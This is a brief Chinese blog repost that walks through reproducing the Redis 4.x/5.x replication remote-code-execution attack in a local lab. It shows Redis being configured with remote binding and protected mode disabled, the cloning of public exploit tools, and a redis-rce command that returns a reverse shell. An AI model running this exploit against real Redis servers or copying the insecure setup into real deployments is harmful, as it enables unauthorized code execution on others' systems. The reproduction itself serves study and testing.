環境搭建

5.0版本下載

wget http://download.redis.io/releases/redis-5.0.5.tar.gz

tar xzf redis-5.0.0.tar.gz cd redis-5.0.5 make

修改配置文件運行遠程訪問

1、將redis.conf文件中的bind 127.0.0.1 這行前面加注釋(#)； 2、將redis.conf文件中的 protected-mode yes 改為no；

./redis-server /root/redis/redis-5.0.0/redis.conf

git clone [url]https://github.com/Ridter/redis-rce.git[/url]
git clone [url]https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git[/url]

編譯module.so文件：

將編譯完的module.so復制到redis-rce目錄下，然后執行以下命令：

python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f module.so

-r參數是指遠程Redis IP地址； -L參數是指反彈到的服務器IP地址；執行命令后，開啟監聽了本地的60720端口，並成功反彈回了shell。

這是針對redis未授權訪問的漏洞這里直接redis.conf文件里面的 requirepass 參數取消注釋這里5.0是默認開啟未授權訪問的

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Redis基於主從復制的RCE 4.x/5.x 復現 Redis未授權訪問 redis未授權訪問getshell Redis未授權訪問利用 redis未授權訪問簡單總結 Redis未授權訪問漏洞利用 ssrf對redis未授權訪問寫webshell [Shell]Redis未授權訪問反彈shell Redis未授權訪問漏洞修復 CAS 5.x搭建常見問題系列(1).未認證的授權服務